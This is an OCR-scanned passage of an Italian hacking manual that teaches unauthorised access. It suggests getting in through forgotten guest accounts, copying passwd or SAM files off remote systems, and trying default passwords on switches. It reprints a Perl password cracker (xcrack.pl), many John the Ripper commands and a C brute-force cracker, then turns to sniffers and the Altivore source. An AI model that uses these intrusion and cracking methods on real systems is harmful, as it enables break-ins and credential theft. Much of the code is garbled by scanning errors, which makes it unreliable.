ad esempio blocca un utente se si supera un certo numero di tentivi falliti. Molti sistemi 
Unix dopo 3 tentativi vi scollegavano. 

In qualche capitolo precedente abbiamo detto che nel caso delle password sarebbe 
consigliabile usare la metodologia relativa alla scalata dei privilegi. 

In altre parole provate ad accedere a qualche sistema con livelli bassi, magari sfruttando 
qualche login GUEST dimenticato dal sysadmin. 

Dopo aver fatto l'accesso a questo livello provate a copiare in qualche modo il file password 
particolare di quel sistema operativo. 

Portatevi sul vostro sistema questo file e successivamente attivate qui i vari programmi adatti 
alla decodifica e all'individuazione delle passwords. 
Il lavoro sarà più veloce in quanto il proceso sarà locale. 

Chiaramente questo era relativo alle passwords usate per l'accesso a livello di OS anche se 
di fatto le passwords le troviamo da qualsiasi parte. 

I posti dove è molto più facile che l'aministratore si dimentichi di cambiare le passwords di 
default è a livello di impianti hardware. 

Sia i routers che i firewalls per arrivare agli switch possiedono passwords le quali possono 

essere utilizzate per accedere alle funzioni amministrative dei sistemi. 

Gli switch sono spesso i punti chiave su cui passano tutti i dati delle reti. 

Spesso e volentieri avvengono dei problemi di settaggio dei firewall per cui gli indirizzi degli 

switch in una intranet vengono mappati all'esterno della rete. 

Facciamo un esempio molto semplice. 

Un router è collegato ad un HUB sulle cui porte ne arrivano alcune di servers con degli IP 
pubblici. 

Su un'altra porta dell'HUB arriva la porta di uscita di un firewal hardware della classe CISCO 
PIX515. 

A questo, sulla porta in input, è collegato un SWITCH Cisco alle cui porte sono collegati tutti i 
sistemi di un Intranet. 

Gli IP pubblici, quelli che arrivano sull'HUB, sono del tipo 210,209.165.0/24. 

Gli IP privati della rete intranet sono della classe 192.168.255.0/24 tra cui ne esiste anche 

uno relativo alla porta di settaggio dello SWITCH stesso. 

II firewall per permettere ai sistemi in intranet di poter uscire sulla rete Internet esegue il 
natting o il mascheramento di questi IP usando un range di IP pubblici di mappatura. 
Questo significa che un ipotetico sistema in intranet 192.168.255.10 verrà mappato su un IP 
pubblico del tipo 21 0.209.1 65.70. 

Questa mappatura come abbiamo detto viene fatta automaticamente dal firewall il quale è 
settato per accettare un certo range di IP in ingresso e quindi di fare una mappatura 
automatica di questi in IP pubblici. 

Se l'amministratore non esegue un settaggio tale in modo che l'IP dello SWITCH non venga 
mappato, anche questo verrà pubblicato sulla rete e quindi sarà visibile dall'esterno. 
Alcuni programmi sono in grado di pingare degli IP e quindi di riconoscere se si tratta di 
qualche strano marchingenio come SWITCH, ROUTER o altro. 

Alcuni dispositivi come determinati switch sono del tipo 'installali e usali' per cui potrebbe 
capitare che l'amministratore si dimentichi di cambiare la password. 

Avete mai visto le maschere HTML che vengono visualizzate da SWITCH come i CISCO 
professionali ? 

Da questi potreste avere l'accesso a tutta la rete creando anche delle VPN. 

Inoltre i tentivi di accedere al sistema di autenticazione di questi dispositivi, potrebbero non 

essere logati. 

Questo per dirvi di nojn scartare l'idea, quando possibile, di cercare di accedere a questi 
sistemi. 

In ogni caso quando si parla di cercare di identificare una password in genere si pensa ai 
login dei sistemi operativi. 

Uno dei più famosi programmi per il cracking delle passwords in ambiente Linux è il seguente 
scritto in Perl. 
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# 

# xcrack.pl — Unix/Linux Password Cracker — VI. 00 

# By manicx — 22nd Dee 98 — email from site 

# Get the latest from http://www.infowar.co.uk/manicx 

# usage = peri xcrack.pl PASSWORDFILE WORDFILE 

# 

# works under Windows ali *nix i can find 

# 

# Updates : Now split into subs and read entire wordfile into an 

# array for extra speed plus breaks out of compare loop now on 

# password crack. Also it will now check for disabled accounts and 

# non—passworded accounts 

# This will probably be the last version of this . 

# I'il be moving to sockets now, look out on the site above. 

# start xcrack.pl 

§system("cls") ; # This will clear the terminal/Dos screen 
# Then stick this info on the screen 

print ("\n \t\t ") ; 

print ("\n \t\t\t Xcrack VI. 00"); 

print ("\n \t\thttp : //www. infowar . co . uk/manicx") ; 
print ("\n \t\t \n") ; 

if ($#ARGV < 1) { 

usage(); # Print simple statement how to use program if no arguments 
exit; 

} 

$passlist = $ARGV[0] ; # Our password File 

$wordlist = $ARGV[1] ; # Our word list 

# Main Start 

getwordlist () ; § getting ali words into array 
getpasslist () ; § getting login and password 
print ("\n\tFinished - ", $wordlist, " - Against - ", $passlist) ; 
# 

sub getpasslist { 

open (PWD, $passlist) or die (" No Good Name for password File ", $passlist, "\n") ; 
while (<PWD>) 
{ 

($fname, $encrypted, $uid, $gid, $cos, $home, $shell) = split ( /:/); 
if ($encrypted eq "\*") # Check if the account is Locked 

{ 

print "Account :", $fname, " \t Disabled\n "; 

next; § Skip to next read 

ì 

if ($encrypted eq "x") § Check if the account is Locked 

{ 

print "Account :", $fname, " \t Disabled\n"; 

next; # Skip to next read 

} 

if ($encrypted eq "") # Check if the account has No Password 

{ 

print "Account :", $fname, " \t No Password\n"; 

next; § Skip to next read 

} 

enccompare () ; § Cali on next Sub 

} 

dose (PWD) ; icloses the password file 

} 

# 

sub getwordlist { 

open (WRD, $wordlist) or die (" No Good Name for wordfile ", $wordlist, "\n") ; 
while (<WRD>) 
{ 

@tmp__array = split; # Getting the entire contents of our 

push @word_array, [@tmp_array] ; # word file and stuffing it in here 

} 

dose (WRD) ; icloses the wordlist 
} 

# 

sub enccompare { 

for $password ( @word_array) 

{ $encword = crypt (@$password [0] , $encrypted) ; # encrypt our word with the same 
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if ($encword eq $encrypted) # as the encrypted password 

{ 

prlnt "Account :",$fname, " \t \aPassword : ", @$password[0] , 

"\n"; 

last; # Print the account name and password if broken then break loop 

} 

} 

} 

# 

sub usage { print "usage = peri xcrack.pl PASSWORDFILE WORDFILE\n" ; } 



Per quanto riguarda Unix uno dei sistemi più famosi è quello denominato John the Ripper's. 
Il metodo per il suo utilizzo è il seguente. 

Per prima cosa dovrete in qualche modo impossessarvi di una copia del file di password. 
Purtroppo se il sistema utilizza le shadow password dovreste dare con il privilegio di root il 
comando : 



In altro modo dovrete dare : 
cp /etc/passwd passwd.1 

Assumiamo che ora abbiate il vostro file 'passwd.1 ', e che vogliate crackare questo. 
Il modo più semplice per eseguire il programma è : 

john passwd.1 

Questo proverà il metodo definito cn il termine di "single crack"per primo, quindi utilizzerà una 
lista di parole come regole per cercare di individuare le pasword. 
Alla fine il sistema passerà al modo incrementale. 

Chiaramente più è grande il file con le parole più saranno le possibilità di individuare le 
passwords. 

Ora potremo vedere se ci sono alcune password individuate con : 
john -show passwd.1 

Potreste ricevere l'informazione che alcune pasword possiedono le hell disabilitate 
John le ignora: 

john -show -shells:-/etc/expired passwd.1 
john -show -shells:-expired passwd.1 



Per controllare se per caso qualche password relativa a root è stata crackata potrete dare : 




Per visualizare solo gli account di root: 



john -show -users:root passwd.1 
Per testare I gruppi privilegiati : 
john -show -groups:0,1 passwd.1 

Se decideste di gestire interattivamente il meotodo di cracking potreste dare : 

john -single passwd.1 
john -si passwd.1 
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Se esistessero più files da crackare : 

john -single passwd.1 passwd.2 
john -single passwd.* 

Per individuare paswords più complesse è possibile utilizzare un metodo di crack molto 
potente. 

Per prima cosa provate con la lista di parole: 

john -w:words.lst passwd.1 

john -wordfile=words.lst passwd.1 

john -w=words.lst passwd.1 

Insomma. 

Esistono un infinità di ozpioni a seconda della tipologia di crack che si vuole eseguire. 
Sono esempi validi di comandi specificati a prompt: 



john -w:words.lst -rules passwd.1 
john -w:words.lst -rules -stdout:8 | unique huge.lst 
john -w:huge.lst passwd.1 
nice -n 20 john -w:words.lst -rules passwd.1 & 
john -w:words.lst -rules -shells:sh,csh,tcsh,bash passwd.1 
john -w:words.lst -rules passwd.* 
john -w:words.lst -rules -users:0 passwd.* 
john -w:words.lst -rules -users:-root, solar passwd.* 
john -w:words.lst -rules -salts:2 passwd.* 



Sempre in rete è possibile trovare un numero enorme di programmi indirizzati a eseguire dei 
crack sui files di password. 

Voi vi chiederete come fare ad averli sottomano per poterli sottoporre a questi programmi. 
In ambiente Windows potete provare di utilizzare i vari metodo legati a NetBios, ai BUGS sui 
WEB o ad altri metodi visti negli appositi capitoli indirizzati ad eseguire programmi sui sistemi 
remoti come ad esempio TFTP per trasferire i files in questione. 

In ambito Unix potreste avere la possibilità di accedere ad un sistema come utente senza 
diritti come ad esempio guest o altro utente. 

Ricordiamoci che spesso raggiungere il livello di root è come eseguire un scalata partendo 
dal basso. 

Riuscire immediatamente accedere ad un sistema come root è spesso complicato se non 
impossibile per cui in questo caso è necessario fare le cose per grado. 
Mettersi su di un sistema remoto a tentare di decodificare le passwords è un lavoro 
pericoloso in quanto vengono attivati dei processi che possono durare ore se non giorni. 
Per questo motivo le attività devono essere svolte in locale. 

Entrando con un grado basso su di un sistema remoto è possibile eseguire la copia del file 
delle passwords, come ad esempio passwd sotto Unix e SAM sotto Windows, per poi poterci 
lavorare localmente. 

Alcuni programmi funzionano anche ondine. 

Sto chiaramente continuando a parlare di software adatti all'identificazione delle passwords. 
L'esecuzione ondine spesso presenta dei problemi dovuti a diversi fattori. 
Il primo è che mediante un determinato settaggio del file Unix 



è possibile specificare da quali tty l'utente root può eseguire il login per cui potrebbe non 

essere possibile accedere come tale da un sistema remoto. 

Di fatto molti sistemi di default permettono l'accesso a root soltanto da console. 

Un'altra limitazione sempre legata ai sistemi Unix è di fatto che in alcuni casi il numero di 

tentativi con password sbagliata può essere limitata a pochissimi tentativi. 
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I programmi che cercano di identificare un password usando il metodo del brute force se usati 
online pretenderebbero un tempo talmente levato da renderne impossibile il loro utilizzo. 
In genere il sistema ottimale per attenere l'accesso è frutto di operazioni complesse che 
vengono eseguite abbinando metodologie di spofing con altre di DOS. 
In altri casi i metodi utilizzano dei buffers overflow. 

In ogni caso di questi metodi parleremo nei capitoli adatti rimanendo in questo capitolo legati 
a quelle che sono le metodologie per cercare di identificare le passwords di sistema. 
Spesso i metodi per riuscire ad avere la meglio su sistemi Unix si basano sul cracking di 
quelli che sono i sistemi meno protetti. 
Prendiamo ad esempio TFTP. 

Questo sistema dispone di un sistema di protezione minimale per cui il fatto di riuscire ad 
utilizzarlo è di fatto importantissimo in quanto grazie all'attivazione di questo diventa possibile 
il trasferimento dei files necessari per poi potere eseguire localmente il lavoro di decodifica. 
Un semplice soiftware indirizzato al cracking delle password Linux è il seguente. 

^include <std±o.h> 
^include <stdl±b.h> 
^include <string .h> 

Static FILE *F, *OF; 
statlc char *fnsep [2048] ; 

int cracking (char *Uname, char *Passwd, char *salt, char *dicstr) 
{ 

char *crypt (char pw[8] , char salt[2]) ; 

if ( ! (strcmp (Passwd, crypt (dicstr, salt) ) ) ) 
{ 

fprintf (OF, "%s %s %s: %s\n", "Password of user", Uname, "is", 
dicstr) ; 

fflush (OF) ; 
return 1; 
} 

return 0; 
} 

void copyrights () 
{ 

printf ( "\n%s\n" , "Unix password cracker, version 2.0 (alpha). 
Production of Scooter corp."); 

printf ("%s\n\n", " (C) Ali rights reserved. Copyright Bishkek, 
Kyrghyzstan, 1996-1997."); 
} 

void openout () 
{ 

if ( ! (OF = fopen ( "crack . out ", "w") ) ) 
{ 

printf ("%s\n", "Can't open output file. Sorry."); 
exit (1) ; 

} 

} 



void anandcrack (int lng, char *salt, char *Passwd, char *Uname) 
{ 

int i; 

char dicstr [256] , tempory [256] ; 

for (i=l ;i<=lng; i++) 
{ 

strcpy (dicstr, fnsep[i]); 

if (cracking (Uname, Passwd, salt, dicstr)==l) return; 

if( (dicstr [0]<=90) && (dicstr [0] >=65) ) dicstr [0] =dicstr [0] +32; 
else 

{ 
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if ( (dicstr [0]>=97) && (dicstr [0] <=122) ) dicstr [0] =dicstr [0] -32; 
} 

if (cracking (Uname, Passwd, salt, dicstr) ==1) return; 

if ( (dicstr [strlen (dicstr) -1]<=90) && (dicstr [strlen (dicstr) -1]>=65) ) 
{ 

dicstr [strlen (dicstr) -1 ] =dicstr [strlen (dicstr) -1 ]+32; 
} 

else 

{ 

if ( (dicstr [strlen (dicstr) -1] >=97) && (dicstr [strlen (dicstr) -1] <=122) ) 
dicstr [strlen (dicstr) -1 ] =dicstr [strlen (dicstr) -1 ]-32; 

if( (dicstr [0]>=97) && (dicstr [0] <=122) ) dicstr [0] =dicstr [0] -32; 
ì 

if (cracking (Uname, Passwd, salt, dicstr) ==1) return; 
strcpy (dicstr, Uname); 

if (cracking (Uname, Passwd, salt, dicstr) ==1) return; 
} 

if(lng>=2) 
{ 

strcpy (dicstr, fnsep [1]); 
strcat (dicstr, fnsep [2] ) ; 

if (cracking (Uname, Passwd, salt, dicstr) ==1) return; 

strcpy (tempory , fnsep [1] ) ; 
dicstr [0 ] =tempory[0 ] ; 
dicstr [1] =• \0 ' ; 
strcat (dicstr, fnsep [2] ) ; 

if( (dicstr [1]<=90) && (dicstr [1] >=65) ) dicstr [1] =dicstr [1] +32; 
else 

{ 

if ( (dicstr [1]>=97) && (dicstr [1] <=122) ) dicstr [1] =dicstr [1] -32; 
} 

if (cracking (Uname, Passwd, salt, dicstr) ==1) return; 



if( (dicstr [0]<=90) && (dicstr [0] >=65) ) dicstr [0] =dicstr [0] +32; 
else 

{ 

if( (dicstr [0]>=97) && (dicstr [0] <=122) ) dicstr [0] =dicstr [0] -32; 
} 

if (cracking (Uname, Passwd, salt, dicstr) ==1) return; 

strcpy (tempory , fnsep [2] ) ; 
dicstr [0 ] =tempory[0 ] ; 
dicstr [1] =' \0 ' ; 
strcat (dicstr , fnsep[l]); 

if( (dicstr [1]<=90) && (dicstr [1] >=65) ) dicstr [1] =dicstr [1] +32; 
else 

{ 

if( (dicstr [1]>=97) && (dicstr [1] <=122) ) dicstr [1] =dicstr [1] -32; 
} 

if (cracking (Uname, Passwd, salt, dicstr) ==1) return; 

if( (dicstr [0]<=90) && (dicstr [0] >=65) ) dicstr [0] =dicstr [0] +32; 
else 

{ 

if( (dicstr [0]>=97) && (dicstr [0] <=122) ) dicstr [0] =dicstr [0] -32; 
} 

if (cracking (Uname, Passwd, salt, dicstr) ==1) return; 
} 

if(lng==3) 
{ 

strcpy (dicstr, fnsep [lì); 
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strcat (dlcstr, fnsep[3] ) ; 

if (cracking (Uname, Passwd, salt, d±cstr)==l) return; 
strcpy (dicstr, fnsep [2] ) ; 
strcat (dicstr, fnsep [3] ) ; 

if (cracking (Uname, Passwd, salt, dicstr) ==1) return; 
} 

} 



void fastcrack (void) 
{ 

FILE *AF; 

char Uname[9], Passwd [30] , temp[256] , salt [2] , pofn[256] ; 
int c=0, i=0, j=0; 

copyright s () ; 

openout () ; 

printf ("%s\n", "Fast mode of discryption. . . ") ; 

if(! (AF= f open ( "passwd . adp" , "r") ) ) 

{ 

printf ("%s\n", "Can't open adapted password file. Sorry."); 

exit (1) ; 

ì 

while(! (feof(AF) ) ) 
{ 

strcpy (temp, " ") ; 
strcpy (pofn, " ") ; 

fscanf(AF, "%s %s %s\n", Uname, Passwd, temp); 
sscanf (Passwd, "%2s", salt); 

printf ("%s %s %s %s\n", "Trying password of user", Uname, "crypted 
password is", Passwd); 

c=0; 
i=0; 
3=0; 

while (0==0) 
{ 

if( (temp[i] ==127) Il (temp [i] == ' \0 ' ) ) 
{ 

pofn[c]='\0' ; 

fnsep [j] = (char *)malloc (strlen (pofn) +1) ; 

strcpy (fnsep [j ] , pofn) ; 

strcpy (pofn, ""); c=0; 

if (temp [!]==• \0' ) break; 

i++; 

) 

else 

pofn [ c++ ] =temp [i++] ; 
} 

anandcrack ( j , salt , Passwd, Uname); 
} 



} 

void adapting (char *str) 
{ 

FILE *PF, *AF; 
int c,j=0; 

char uname[9], password [30] , fullname [256] , *fields [2048] , i; 

if(! (PF=fopen (str, "r ") ) ) 
{ 

printf ("Can't open your password file. Sorry. \n") ; 

exit(l); 

} 

if(! (AF=f open ("passwd. adp", "w") ) ) 
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prlntf ("Can' t open tempory file. Sorry . \n" ) ; 

exit (1) ; 

} 



while (i) 
{ 



while (i) 
{ 



c=0; 



while ( (i=fgetc (PF) )!=':') 
{ 

if(i=='\n') goto endofline; 

if(feof(PF)) goto complit; 

fullname [c]=i; 

c++; 

} 

fullname [c] =' \0 ' ; 
D++! 

fields[j] = (char *)malloc (strlen (fullname) +1) ; 
strcpy (fields [ j] , fullname) ; 
strcpy (fullname , " ") ; 



endofline : 



strcpy (fullname, fields[j-l]); 
c=0; 

while ( fullname [c] !='\0') 
{ 

if( (fullname [c]==' ') Il ( fullname [c] ==' , ')) 

fullname [c ] =127; 

c++; 
) 

if( (! (strstr( fields [2] , "*"))) SS (! (strstr (fields [2] , "!"))) 
SS (! (strstr (fields [2] , " "))) SS (! (strlen (fields [2] ) <13) ) ) fprintf (AF , 
"%s %s %s\n", fields[l], fields [2], fullname); 

j=0; 

) 

complit : 

foiose (AF) ; 
foiose (PF) ; 

} 



main(int argo, char *argv[]) 
{ 

Static FILE *F, *DF; 
char *pws, *dicstr; 

char *str[] 

{"A", "B " , "C", "D " , "E", "F " , "G" , "H " , "I", "J", "K" , "L", "M" , "N" , "0" , "P" , "Q", "R" , "S 
, "T", "U", "V", "W", "X", "Y", "Z", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k ", "1 

"m " "n " "/-» " "t-i " "rr" fi*» ti » a " " "ti" "tt-" " w n n X r" " v " " 

r 111 r 11 r u r tr r H r x r * r *~ r u r v r w r ■* r J r r 

ti tt „ ti tt f tt tt q ti tt ^ ti tt ti tt ^ tt tt A tt tt £ tt tt # tt tt j ti ti j ti ti ti ti_j_ ti ti j ti ti " ti ti ^ " ti £ ti ti ^ ti ti t 

ti ti ^ ti it Qtt ti y ti tt Qtt it g tt 11 Qtt ti 

it ti it ti \ \ ti ti r ti ti i ti ti .ti ti i il il ti ti ti ti / ti it ^ il il ^ il n il n . il n \ ti ti ti r ti ti i il i . 

char *salt, Uname[8], *Passwd, *Tpasswd[13] f *cwd, *temp; 
char *crypt (char pw[8] , char salt[2]); 
int 11, ±2, 13, 14, 15, 16, 1 7, 18; 

pws= (char *)malloc (8) ; 
cwd= (char *)malloc (256) ; 
Passwd= (char *)malloc (13) ; 
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dlcstr= (char *)malloc (256) ; 
temp= (char *)malloc (256) ; 
±f((argc == 1) ) 
{ 

prlntf ( "%s\n" , "Too few parameters for run crack. Usage: Crack 
[-d] [-f] PasswdFile. ") ; 

exit(l); 

) 

if(! (strcmp(argv[l] , "-d"))) 
{ 

adaptlng (argv [2] ) ; 

if(!(F = fopen("passwd.adp", "r"))) 
{ 

prlntf ( "%s\n" , "Can't open adapted password file for reading. 

Sorry. ") ; 

exit(l); 

) 

openout () ; 
goto agains; 
} 

if(! (strcmp(argv[l] , "-f"))) 
{ 

adaptlng (argv [2] ) ; 

if(!(F = fopen("passwd.adp" , "r"))) 
{ 

prlntf ("%s\n", "Can't open adapted password file for reading. 

Sorry. ") ; 

exit(l); 

) 

openout () ; 
fastcrack () ; 

prlntf ("Work complited. . . \n") ; 

remove ( "passwd. adp ") ; 

fclose (OF) ; 

exit (0) ; 

} 

adaptlng (argv [1 ] ) ; 
lf(!(F = fopen ( "passwd . adp ", "r "))) 
{ 

prlntf ( "%s\n" , "Can't open adapter password file for reading. 

Sorry. ") ; 

exlt(l); 

} 

openout () ; 
copyright s () ; 
Arounds : 

fflush (OF) ; 
If ( (feof (F) ) ) 
{ 

prlntf ("Work complited. . . \n") ; 
remove ( "passwd .adp") ; 
exit (0) ; 
} 

fscanf(F,"%s %s %s\n", Uname, Passwd, temp) ; 

sscanf (Passwd, "%2s", salt) ; 
prlntf ("%s %s %s %s\n", "Trying password of user", Uname, "crypted 
password is", Passwd); 

prlntf ( "%s\n" , "The 1-st level of descryption . . . " ) ; 



for (11=0; il<=94; 11++) 
{ 

strcpy (pws, str[il]); 

if (cracking (Uname, Passwd, 



salt, pws)==l) goto Arounds; 
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printf ("%s\n", "The 2-nd level of descryptlon . . . " ) ; 

for(ll=0;ll<=94;±l++) 

( 

for (±2=0; i2<=94; 12++) 
{ 

strcpy (pws, str[±l ] ) ; 
strcat(pws, str[12]); 

if (cracking (Uname, Passwd, salt, pws)==l) goto Arounds; 

} 

} 

printf ("%s\n", "The 3-th level of descryptlon. ..") ; 

for (11=0; 11<=94; 11++) 

{ 

for (12=0; 12<=94; 12++) 
{ 

for (13=0; 13<=94; 13++) 
{ 

strcpy (pws, str[ll]); 
strcat(pws, str[12]); 
strcat(pws, str[13]); 

if (cracking (Uname, Passwd, salt, pws) ==1) goto Arounds; 

} 

} 

) 

printf ("%s\n", "The 4-th level of descryptlon..."); 

for (11=0 ; il<=94 ; 11++) 

{ 

for (12=0; i2<=94; 12++) 
{ 

for (13=0; i3<=94; 13++) 
{ 

for (14=0 ; i4<=94 ; 14++) 
{ 

strcpy (pws, str[il]); 
strcat(pws, str[12]); 
strcat(pws, str[13]); 
strcat(pws, str[i4]); 

if (cracking (Uname, Passwd, salt, pws)==l) goto Arounds; 

} 

) 

) 

) 

printf ("%s\n", "The 5-th level of descryptlon. ..") ; 

for (il=0;il<=94;il++) 

( 

for (12=0; 12<=94; 12++) 
{ 

for (13=0; 13<=94; 13++) 
{ 

for (14=0 ; i4<=94 ; 14++) 
( 

for (15=0; i5<=94; 15++) 
{ 

strcpy (pws, str[il]); 
strcat(pws, str[12]); 
strcat(pws, str[13]); 
strcat(pws, str[i4]); 
strcat(pws, str[15]); 

if (cracking (Uname, Passwd, salt, pws)==l) goto Arounds; 



printf ("%s\n", "The 6-th level of descryptlon..."); 
for (il=0;il<=94;il++) 

< 
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for (±2=0; 12<=94; 12++) 
{ 

for (±3=0; ±3<=94; ±3++) 
{ 

for (14=0; i4<=94; 14++) 
( 

for (15=0; 15<=94; 15++) 
{ 

for (1 6=0; 1 6<=94; 1 6++) 
{ 

strcpy (pws, str[ll]); 
strcat(pws, str[12]); 
strcat(pws, str[13]); 
strcat(pws, str[14]); 
strcat(pws, str[15]); 
strcat(pws, str[16]); 

if (cracking (Uname, Passwd, salt, pws) ==1) goto Arounds; 

} 

) 

) 

) 

} 

) 

printf ("%s\n" , "The 7-th level of descryption . . . " ) ; 

for(il=0;il<=94;il++) 

( 

for (12=0; i2<=94; i2++) 
( 

for (13=0; ±3<=94; 13++) 
{ 

for (±4=0; i4<=94; Ì4++) 
( 

for (±5=0; ±5<=94; ±5++) 
{ 

for (± 6=0; ± 6<=94; ± 6++) 
{ 

for (± 7=0; ± 7<=94; ± 7++) 
( 

strcpy (pws, str[±l]); 
strcat(pws, str[±2]); 
strcat(pws, str[±3]); 
strcat(pws, str[±4]); 
strcat(pws, str[±5]); 
strcat(pws, str[±6]); 
strcat(pws, str[±7]); 

±f (crack±ng (Uname, Passwd, salt, pws) ==1) goto Arounds; 

} 

} 

) 

} 

) 

} 

) 

pr±ntf("%s\n", "The 8-th level of descrypt±on . . . " ) ; 

for (11=0; 11<=94; 11++) 

( 

for (12=0; 12<=94; 12++) 
( 

for (13=0; 13<=94; 13++) 
{ 

for (14=0 ; 14<=94 ; 14++) 
( 

for (15=0; 15<=94; 15++) 
{ 

for (1 6=0; 1 6<=94; 1 6++) 
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for (1 7=0; i 7<=94; 1 7++) 
{ 

for (18=0; i8<=94; 18++) 
{ 

strcpy (pws, str[il]); 
strcat(pws, str[i2]); 
strcat(pws, str[i3]); 
strcat(pws, str[14]); 
strcat(pws, str[i5]); 
strcat(pws, str[16]); 
strcat(pws, str[17]); 

If (cracking (Uname, Passwd, salt, pws) ==1) goto Arounds; 

} 

} 

) 

} 

) 

) 

) 

) 

fflush (OF) ; 
goto Arounds; 
agalns : 

lf(! (DF= fopen ( "crack .die", "r") ) ) 
{ 

printf ( "%s\n" , "Can't open dictionary file. Sorry."); 

exit (1) ; 

} 

copyright s () ; 

printf ("%s\n", "For discryption using dictionary..."); 

while(! (feof(F) ) ) 

{ 

fscanf(F, "%s %s %s\n", Uname, Passwd, temp) ; 
sscanf (Passwd, "%2s", salt); 

printf ("%s %s %s %s\n", "Trying password of user", Uname, "crypted 
password is", Passwd); 

while ( ! (feof (DF) ) ) 
{ 

fscanf(DF, "%s\n", dicstr) ; 

if (cracking (Uname, Passwd, salt, dicstr) ==1) goto nextp; 

if( (dicstr [0]<=90) && (dicstr [0] >=65) ) dicstr [0] =dicstr [0] +32; 
else 

{ 

if( (dicstr [0]>=97) && (dicstr [0] <=122) ) dicstr [0] =dicstr [0] -32; 
} 

if (cracking (Uname, Passwd, salt, dicstr) ==1) goto nextp; 



if ( (dicstr [strlen (dicstr) -1]<=90) && (dicstr [strlen (dicstr) -1]>=65) ) 
{ 

dicstr [strlen (dicstr) -1 ] =dicstr [strlen (dicstr) -1 ]+32; 
} 

else 

{ 

if( (dicstr [strlen (dicstr) -1]>=97) && (dicstr [strlen (dicstr) -1]<=122) ) 
dicstr [ strlen (dicstr) -1 ] =dicstr [strlen (dicstr) -1 ]-32; 

if( (dicstr [0]>=97) && (dicstr [0] <=122) ) dicstr [0] =dicstr [0] -32; 
} 

if (cracking (Uname, Passwd, salt, dicstr) ==1) goto nextp; 
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; 

nextp: fseek(DF, SEEK_SET, 0) ; 
strcpy (dicstr , " ") ; 
} 

dose (OF) ; 
dose (DF) ; 
dose (F) ; 

remove ( "passwd. adp ") ; 

pr±ntf("%s\n", "Work compllted . . . " ) ; 
return 1; 

Il vocabolario usato dal programma è nel solito formato ovvero ogni righa una parola. 



Abanic 

Abantes 

Abarambo 

Abari s 

Abasgi 

Abassin 

Abatua 




Gli sniffer 

Una delle fasi fondamentali nel campo dell'hacking è sicuramente quella legata ai metodi che 
permettono di analizzare e visualizzare i pacchetti con le informazioni esattamente nel 
formato di pacchetto previsto dalla tipologia di dati che si cerca di vedere. 
Uno degli sniffer più famosi è quello usato da FBI conosciuto con il nome di Carnivore il quale 
piazzato su un determinato sistema è in grado di duplicare i pacchetti di dati inviandone una 
copia ad un determinato indirizzo remoto. 

Lo sniffing è una tecnica che coinvolge l'analisi dei pacchetti a bassissimo livello ovvero come 
questi vengono gestiti sull'interfaccia hardware di rete sulla quale vengono gestiti i dati di un 
determinato IP. 

Molti pacchetti commerciali modificano i driver a basso livello nel caso di sistemi operativi 
come ad esempio Windows mentre con altri, come ad esempio Linux, questi si supportano su 
determinate caratteristiche e drivers installati a livello di kernel. 

Sto parlando di TCPDUMP che nel caso di Linux viene usato per quasi tutti i sistemi software 
che eseguono analisi e manipolazioni di pacchetti di dati a basso livello. 
Lo sniffing è una tecnica che viene eseguita per analizzare i dati presenti dentro ai pacchetti 
che viaggiano su un certo segmento di rete. 

Specifico segmento in quanto lo sniffing non può essere fatto specificando indirizzi IP non 
direttamente connessi ad una delle interfacce presenti sulla macchina sulla quale viene 
attivato il programma. 

I dati visualizzati da uno sniffer possono essere soltanto relativi alle informazioni presenti 
dentro all'header dei pacchetti oppure può essere estesa a tutto il pacchetto compresi i dati 
veri e propri. 

Questa metodologia viene spesso utilizzata per scoprire numeri di carte di credito o 
comunque informazioni riservate che vengono inviati da un sistema ad un altro. 
I vari protocolli di cryptografia servono appunto a minimizzare i danni che potrebbero essere 
arrecati da una procedura di sniffing. 

Chiaramente lo sniffer intercetta a livello di driver i dati per cui se il programma che esegue 
l'invio di questi pensa a codificarli prima di eseguire il send lo sniffer stesso visualizzerà delle 
informazioni difficilmente interpretabili. 

Uno degli sniffer per ambiente Windows più conosciuti è COMMVIEW il quale oltre al fatto di 
potere visualizzare le informazioni dei pacchetti permette di settare anche delle regole di 
filtraggio mediante la specifica degli IP soggetti all'analisi, i protocolli e cosi via. 
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Questa elasticità fa di COMMVIEW un ottimo strumento per tutte quelle problematiche legate 
alla gestione della sicurezza dei sistemi. 

La possibilità di poter settare i protocolli e gli ip da visualizzare permette di tenere sotto 
controllo visivo quelli che sono gli attacchi fatti dall'esterno. 

Spesso, se non sempre, gli sniffer si agganciano ai device driver che gestiscono i pacchetti 
di rete in quanto in effetti questi utilizzono questi ultimi per accedere ai vari pacchetti che 
vengono trattai su questi. 

La differenza sostanziale tra un programma normale ed uno sniffer sta solo nel fatto che in 
genere i primi gestiscono solo i pacchetti indirizzati a loro mentre i secondi lavorano in 
modalità promiscua offrendo la possibilità di visualizzare qualsiasi pacchetto venga gestito 
sull'interfaccia. 

Esistono alcuni sniffer particolari come ad esempio alcuni il cui scopo è quello di intercettare 
e mirrorizzare le informazioni trattate da un determinato protocollo come ad esempio SMTP. 
Parlavamo all'inizio dei questo capitolo di Carnivore il pacchetto usato da FBI per sniffare le 
informazioni su determinati sistemi. 

Questo software è stato sempre coperto da segreto in quanto ha sollevato un certo numero di 
polemica per quanto riguardava la privacy delle informazioni. 

Network ICE ha rilasciato i sorgenti di un software che risulta essere un similare di Carnivore 
il quale compilato in ambiente Linux, oppure in quello Windows agganciandosi alle librerie 
WINDUMP, rende possibile lo sniffing delle informazioni di un determinato sistema. 

/* 

Copyright (c) 2000, Network ICE 
Ali rights reserved. 

Use or posession of this code implies agreement with the license 
agreement set forth at : 

http: //www. networkice . com/altivore/altivore-license . html 



ALTIVORE vO.9.3 

This is a sample program containing some of the features of the 
features of the FBI ' s "Carnivore" program. It is intended to serve 
as a point of discussion about Carnivore features. It has not been 
thoroughly tested and contains numerous bugs. 

This may also serve as an "alternative" for ISPs who do not wish to 
instali a black—box from the FBI. Court orders demanding data from 
the ISP do not necessarily require that Carnivore must be used if 
the ISP is able to obtain the data in another manner. 

This software may also be useful in network management, such as 
backing up data or sniffing a consumer 's dial-up connection when 
they are reporting problems to customer support . 

HOW TO USE THIS SOFTWARE 

This software must be compiled and linked with the libpcap library . 
Libpcap must likewise be installed on the system in order to for 
this to run. 

This software has been compiled and briefly tested under Windows 
and Linux. It should run on pretty much any system with some minor 
adjustments . 

Windows Compilation 

Download WINPCAP developers kit from: 

http : //netgroup—serv. polito . it/winpcap/ 
Point the include directory to "WPdpack/include" and link with the 
libraries "libpcap . lib" , "user32 . lib" , and "wsock32 . lib" . 

Linux Compilation 

gcc altivore.c -lpcap -Ipcap -o altivore 
